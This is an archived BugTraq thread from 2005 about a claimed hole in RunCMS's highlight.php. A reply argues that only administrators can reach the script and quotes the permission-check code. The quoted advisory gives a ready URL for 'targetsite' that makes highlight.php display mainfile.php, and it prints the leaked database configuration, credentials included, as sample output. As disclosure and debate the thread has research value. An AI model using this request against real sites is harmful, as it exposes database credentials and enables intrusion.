BugTraq
runcms highlight.php hole Aug 18 2005 03:37AM
Security Lists (secure kkeonline com)
This is a stupid BUG report.
They found the bug without checking the script or they know but dont
said about it to promote their group.

The truth is the script is allow only user that have the right to access
the "systems" module to use it,
this mean only admin and some moderators/users that have the right to
access "systems" module can use this script.
Normal users and unregistered user can not use this script, does this
should call BUG ?
It's mean he found this bug when he logged in as admin, once he is
logged out he will never success again until.

What's does this code mean???
if ($xoopsUser) {
$xoopsModule = XoopsModule::getByDirname('system');
if ( !$xoopsUser->isAdmin($xoopsModule->mid()) ) {
redirect_header(XOOPS_URL.'/', 3, _NOPERM);
exit();
}
} else {
redirect_header(XOOPS_URL.'/', 3, _NOPERM);
exit();
}

----------------------

********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT (at) ihsteam (dot) com [email concealed]
********************************************
If You Have RUNCMS Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In RUNCMS 1.1A
-------------------------------------------
Input This Line To Your Browser AddressBar :

http://targetsite/runcmsinstalation/class/debug/highlight.php?
file=runcmsinstallationpath\mainfile.php&line=151#151

Like This :

http://localhost/runcms/class/debug/highlight.php?
file=c:\phpdev\www\runcms\mainfile.php&line=151#151

You See This Result :

1 <?php
2 // -------------------------------------------------------------------
------ //
3 // E-Xoops: Content Management for the
Masses //
4 // < http://www.e-xoops.com
> //
5 // -------------------------------------------------------------------
------ //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8 define('XOOPS_MAINFILE_INCLUDED', 1);
9
10 // Physical Path
11 // Physical path to your main RUNCMS directory WITHOUT trailing
slash. ( On windows use simple forward slashes & be sure to include the
drive letter. c:/myfolder )
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');
13
14 // Virtual Path (URL)
15 // Virtual path to your main RUNCMS directory WITHOUT trailing
slash. ( http://www.mysite.com/myfolder )
16 define('XOOPS_URL', 'http://localhost/runcms1.1');
17
18 // Database
19 // Choose the type of database to be used.
20 $xoopsConfig['database'] = 'mysql';
21
22 // Table Prefix
23 // This prefix will be added to all new tables created to avoid
name conflict in the database. If you are unsure, just use the
default 'runcms'.
24 $xoopsConfig['prefix'] = 'runcms';
25
26 // Database Hostname
27 // Hostname of the database server. ( If you are
unsure, 'localhost' works in most cases. )
28 $xoopsConfig['dbhost'] = 'localhost';
29
30 // Database Username
31 // Your database user account on the host. ( Often root when
installed on your local machine. )
32 $xoopsConfig['dbuname'] = 'root';
33
34 // Database Password
35 // Password for your database user account.
36 $xoopsConfig['dbpass'] = '';
37
38 // Database Name
39 // The name of database on the host. The installer will attempt
to create the database if not exist.
40 $xoopsConfig['dbname'] = 'aaa';
41
42 // Use persistent connection? (Yes=1 No=0)
43 // Default is 'No'. Choose 'No' if you are unsure.
44 $xoopsConfig['db_pconnect'] = 0;
45
46 // Default setup language.
47 $xoopsConfig['default_language'] = 'english';
48
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 }
?>

------------------------------------------

More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12

Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14

Found By NT(IHS)
NT (at) IHSTeam (dot) com [email concealed]
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com

--
www.IHSTEAM.com
www.IHSSECURITY.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus